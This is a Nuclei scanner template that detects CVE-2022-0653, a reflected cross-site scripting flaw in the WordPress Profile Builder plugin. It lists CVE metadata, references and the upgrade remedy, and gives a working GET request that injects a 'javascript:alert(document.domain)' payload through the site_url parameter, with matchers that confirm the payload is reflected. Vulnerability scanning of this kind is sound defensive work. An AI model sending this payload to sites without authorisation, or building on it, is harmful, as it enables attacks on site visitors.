nuclei-templates/http/cves/2022/CVE-2022-0653.yaml

53 lines
2.4 KiB
YAML

id: CVE-2022-0653
info:
name: Wordpress Profile Builder Plugin Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: |
The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Upgrade to version 3.6.5 or later.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
- https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail=
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0653
cwe-id: CWE-79
epss-score: 0.00206
epss-percentile: 0.58565
cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: cozmoslabs
product: profile_builder
framework: wordpress
tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="javascript:alert(document.domain);">here</a>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a0047304502202cb8744bb8cd388cf8bb62476440ac8b97aab734459eb07a7792d1c1cf7bc94d0221009d1856acb1577ebdadad2a985c047beb2a152bd3e730d0d38d76a07e589bb3b9:922c64590222798bb761d5b6d8e72950